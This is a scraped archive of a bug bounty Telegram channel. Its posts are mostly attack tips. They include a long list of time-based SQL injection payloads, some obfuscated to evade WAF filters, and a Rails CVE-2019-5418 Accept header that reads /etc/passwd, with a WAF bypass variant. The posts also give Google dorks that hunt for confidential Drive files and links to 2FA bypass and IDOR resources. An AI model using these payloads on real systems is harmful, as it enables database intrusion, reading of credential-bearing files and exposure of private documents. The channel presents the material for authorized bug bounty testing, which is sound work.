fa
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

رفتن به کانال در Telegram
7 460
مشترکین
+524 ساعت
+307 روز
+17430 روز
آرشیو پست ها
⚡️SQLI Login Bypass Payloads #bugbounty
⚡️SQLI Login Bypass Payloads #bugbounty

Python Penetration Testing Essentials.pdf8.18 MB

If you hate wasting time with 2FA, try this: 1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA
If you hate wasting time with 2FA, try this: 1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites. 2. Install Espanso, then add the config below. Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast! Credit- sw33tLie

🔖2FA bugs setup/implementation, bypass and disable. 🔗 What is two-factor authentication? 🌐 Cloudflare 🔗 Multi-factor Auth
🔖2FA bugs setup/implementation, bypass and disable. 🔗 What is two-factor authentication? 🌐 Cloudflare 🔗 Multi-factor Authentication Labs: 🌐 Portswigger 🔗 2FA/MFA/OTP Bypass: 🌐 Hacktricks 🔗 Testing 2 Factor Authentication: 📱Github 🔗 Account Takeover (2FA Bypasses): 📱Github

Authentication Bypass: ⚔️
Authentication Bypass: ⚔️

☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. 🛍https://github.com/errorfiathck/IDOR-Forge

⚠️Google Drive Dorks site:http://drive.google.com inurl:folder site:http://drive.google.com inurl:open site:http://docs.google.com inurl:d site:http://drive.google.com "confidential" site:http://docs.google.com inurl:d filetype:docx

🌟One-Liner - Extract all URLs from the Source Code curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*' 🔔@0x0Soja
🌟One-Liner - Extract all URLs from the Source Code
curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'
🔔@0x0SojalSec

timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug,
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ 🛍If the server is deemed to be vulnerable, but a WAF is present: ../../../../../../e*c/p*s*d{{ ✔️Credit- nav1n0x

Google Dorking for Pentesters.pdf1.23 MB

Testing Account Takeover Vulnerabilities.⚔️
Testing Account Takeover Vulnerabilities.⚔️